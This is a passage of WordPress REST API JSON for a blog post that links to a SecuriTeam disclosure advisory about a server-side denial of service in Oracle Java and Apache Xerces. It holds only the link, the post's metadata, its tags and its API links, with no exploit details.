href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3271\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Oracle Java and Apache Xerces PDF\/Docx Server Side DoS<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10532,10757],"class_list":["post-9010","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-denial-of-service","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9010","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9010"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9010\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9010"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}